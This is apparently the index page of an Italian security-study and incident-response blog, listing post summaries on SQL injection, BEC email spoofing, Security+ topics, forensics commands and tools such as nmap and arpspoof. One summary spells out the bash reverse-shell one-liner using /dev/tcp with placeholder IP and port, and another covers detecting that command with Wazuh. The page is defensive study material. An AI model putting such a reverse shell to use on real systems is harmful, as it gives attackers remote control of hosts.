Dfir on u-random

Il Campo che Parlava Troppo

Tue, 19 May 2026 00:00:00 +0000

TL;DR

SQL Injection avviene quando l'input utente viene concatenato direttamente nella query - il DB esegue codice che non dovrebbe
Un apostrofo nel campo username è spesso sufficiente per rilevare la vulnerabilità
La difesa corretta è la parameterized query - non l'input validation da sola
Il WAF può rallentare l'attacco ma non sostituisce il fix nel codice

▶ $ history

curl -s -X POST url -d "username=test&password=test"
tshark -r capture.pcap -Y "http.request.method == POST"

Mi hanno dato tre ore e un URL. Un'applicazione web interna - gestionale ordini, usato dal reparto commerciale. "Testala. Dimmi cosa non va."

Il CEO Non Ha Scritto Quella Email

Tue, 19 May 2026 00:00:00 +0000

TL;DR

BEC (Business Email Compromise) non richiede malware - basta falsificare il campo From: in SMTP
SPF, DKIM e DMARC sono i tre record DNS che rendono verificabile l'identità del mittente
Un dominio senza questi tre record è impersonabile in cinque minuti da chiunque
Leggere gli header Received: di un'email dal basso verso l'alto rivela il percorso reale del messaggio

▶ $ history

dig TXT dominio.com
dig TXT _dmarc.dominio.com

Arianna gestisce i pagamenti. Quella mattina ha ricevuto un'email dal CEO: cambio fornitore urgente, nuovo IBAN, bonifico entro fine giornata. 47.000 euro. Il tono era quello di sempre - formale, diretto, niente spiegazioni superflue.

Ruoli Aziendali - C-Suite e figure Security

Mon, 11 May 2026 00:00:00 +0000

Mappa delle figure dirigenziali e dei ruoli security in un'organizzazione. Utile per domande di governance e GRC sul Security+.

Bash Reverse Shell - Anatomia del comando

Sun, 10 May 2026 00:00:00 +0000

Analisi del comando bash -i >& /dev/tcp/IP/PORT 0>&1 - come funzionano i redirect di file descriptor e il pseudo-device /dev/tcp.

Operational Plans - DRP, IRP, BCP, Change Management

Sun, 10 May 2026 00:00:00 +0000

Distinzione tra i piani operativi: Disaster Recovery Plan, Incident Response Plan, Business Continuity Plan e Change Management. Termini D4/D5 Security+ frequenti.

Security Controls - Tipi e Funzioni

Sun, 10 May 2026 00:00:00 +0000

Classificazione dei controlli di sicurezza per tipo (Technical/Administrative/Physical) e per funzione (Preventive/Detective/Corrective/Compensating/Deterrent/Directive).

Frame, Pacchetto, Segmento - OSI e Stream

Thu, 07 May 2026 00:00:00 +0000

Differenza tra frame (L2), pacchetto IP (L3) e segmento TCP (L4). Matrioska OSI, NIC, stream indipendenti per livello. Base per leggere correttamente tshark e Wireshark.

Incident Response - Modiga cap 9 - Analisi e risposta agli incidenti

Wed, 06 May 2026 00:00:00 +0000

Gestione degli incidenti secondo Modiga cap 9: fasi IH, detection, analisi, prioritizzazione, SIEM tuning, containment. Nota in corso - p. 509.

SOC - Struttura e Organizzazione

Mon, 04 May 2026 00:00:00 +0000

Struttura operativa di un SOC: tier, ruoli specializzati, modelli di deployment (interno/esterno/ibrido), SLA, KPI, differenza SOC vs NOC.

whois

Sun, 03 May 2026 00:00:00 +0000

Interroga i database WHOIS per ottenere informazioni su un IP o dominio: ASN, organizzazione, paese, range di indirizzi, abuse contact.

Wazuh + auditd: rilevare una reverse shell con regola custom

Sat, 02 May 2026 00:00:00 +0000

Come integrare auditd con Wazuh (Docker) per rilevare bash /dev/tcp: architettura agent/manager, permessi, formato log, regola XML custom.

DNS e HTTP in una LAN con switch

Fri, 01 May 2026 00:00:00 +0000

Come funziona la risoluzione DNS e la richiesta HTTP in una LAN flat con switch, senza router né gateway.

DNS Tunneling

Wed, 29 Apr 2026 00:00:00 +0000

Tecnica C2 che usa il protocollo DNS per trasportare comandi e dati esfiltrati, bypassando i firewall perche' UDP 53 e' quasi sempre permesso.

Incident Response - Framework e Lifecycle

Tue, 28 Apr 2026 00:00:00 +0000

Definizione di IR, confronto framework (NIST, PICERL, MITRE ATT&CK, Time Based Security) e dettaglio operativo delle fasi PICERL con checklist.

HTTP in Wireshark - TCP Segmentation e Packet Analysis

Fri, 17 Apr 2026 00:00:00 +0000

Come appare una sessione HTTP in Wireshark: TCP segmentation, MSS, Nagle's algorithm, gzip. Prospettiva packet analysis.

arpspoof - ARP cache poisoning tool

Thu, 09 Apr 2026 00:00:00 +0000

Tool per ARP poisoning — manda pacchetti ARP falsi in loop per avvelenare la cache ARP di un target. Usato per simulare attacchi MITM in laboratorio e capire come rilevarli.

nmap - Network Mapper

Fri, 03 Apr 2026 00:00:00 +0000

Mappa la rete mandando pacchetti TCP/UDP/ICMP verso host e porte target e analizza le risposte. Da un singolo SYN capisce se una porta e' aperta, chiusa o filtrata. Strumento standard per asset discovery, port scanning e audit di sicurezza.

Il Processo che Non Dorme Mai

Wed, 01 Apr 2026 00:00:00 +0000

TL;DR

Alert alle 2:47: processo bash con connessione aperta verso IP esterno su porta 4444 → reverse shell attiva
ss -tnp | grep ESTABLISHED identifica il processo e il PID in tempo reale
tcpdump -i eth0 -n -A legge il payload in chiaro: comandi dell'attaccante visibili direttamente
Prima di bloccare: raccogliere history, auth.log, find -mmin -120 - agire troppo presto distrugge le prove

▶ $ history

ss -tnp
tcpdump -i eth0 -n -A host 185.220.101.34
ip a
history
grep "185.220.101.34" /var/log/auth.log
find / -mmin -120 -type f 2>/dev/null
kill -9 [PID]
ufw deny from [IP]

Git Objects - struttura interna di git

Sat, 28 Mar 2026 00:00:00 +0000

Git memorizza tutto come oggetti immutabili nel database .git/objects. Ogni commit, system, albero e tag e' un oggetto con un hash SHA-1. Capire questa struttura e' fondamentale per il secret scanning - i segreti sopravvivono nella storia anche dopo la rimozione.

Secret Scanning - trovare segreti esposti

Sat, 28 Mar 2026 00:00:00 +0000

Il secret scanning e' la pratica di cercare credenziali, chiavi API e segreti esposti per errore in repository git, file di configurazione e log. E' uno dei vettori di compromissione piu' comuni e sottovalutati.

Compressione e Archivi - gzip, bzip2, zip, tar

Fri, 27 Mar 2026 00:00:00 +0000

Guida unificata a gzip, bzip2, zip e tar su Linux. Copre compressione singoli file, archiviazione multi-file, formato tar.gz, e uso forense per analisi di archivi sospetti.

Cancellato. Ma non abbastanza.

Wed, 25 Mar 2026 00:00:00 +0000

TL;DR

testuser compare all'01:14, tenta l'escalation, poi viene cancellato alle 04:47
auth.log registra ogni evento: creazione, tre sudo falliti, disconnessione
find / -uid 1001 2>/dev/null trova i file rimasti anche dopo userdel
Cancellare un utente non cancella la sua storia - cancella solo il nome

▶ $ history

grep -E "useradd|userdel" /var/log/auth.log
grep "testuser" /var/log/auth.log
last testuser
find / -uid 1001 2>/dev/null
cat /home/testuser/.bash_history
journalctl --since "2026-03-25 04:40"

CIA Triad

Sun, 22 Mar 2026 00:00:00 +0000

La triade CIA definisce i tre obiettivi fondamentali della sicurezza informatica: Confidentiality, Integrity, Availability. Ogni attacco viola almeno uno di questi tre pilastri.

diff - confronta differenze tra due file

Sun, 15 Mar 2026 00:00:00 +0000

Confronta due file riga per riga e mostra le differenze. Fondamentale per rilevare modifiche non autorizzate a file di configurazione o log.

File

Sun, 15 Mar 2026 00:00:00 +0000

Determina il tipo di contenuto di un file esaminando la sua struttura interna (Magic Bytes / Magic Numbers), ignorando completamente l'estensione. È uno strumento critico per distinguere file di testo, binari, script o malware mascherati.

strings - estrae stringhe leggibili da file binari

Sun, 15 Mar 2026 00:00:00 +0000

Analizza file binari o flussi di dati per estrarre e stampare sequenze di caratteri ASCII (testo leggibile) lunghe almeno 4 caratteri (default).

Xxd

Sun, 15 Mar 2026 00:00:00 +0000

Utility che genera hexdump o effettua l'operazione inversa (Hex-to-Binary). Il nome sta per hex dump.